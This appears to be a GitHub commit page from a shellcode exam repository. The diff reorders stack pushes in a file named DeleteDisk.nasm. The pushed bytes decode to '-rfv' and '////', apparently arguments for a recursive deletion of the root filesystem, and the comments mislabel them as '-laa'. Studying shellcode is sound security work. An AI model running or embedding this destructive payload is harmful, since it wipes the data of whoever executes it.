Skip to content

Commit

Permalink
Trying hard...
Browse files Browse the repository at this point in the history
  • Loading branch information
cr7pt0pl4gu3 committed Nov 15, 2020
1 parent 83fcd03 commit d8c0bb4
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions Exam/DeleteDisk/DeleteDisk.nasm
Original file line number Diff line number Diff line change
Expand Up @@ -15,10 +15,10 @@ _start:
mov ebx, esp ;move pointer to command into ebx

push eax ;push null eax register to the stack
push 0x7666722d ;push argument to the stack "-laa"
push 0x2f2f2f2f ;push argument to the stack "-laa"
mov esi, esp ;move stack pointer to esi
push esi
push 0x2f2f2f2f
push 0x7666722d
mov esi, esp

push eax ;push null eax register to the stack
Expand Down

0 comments on commit d8c0bb4

Please sign in to comment.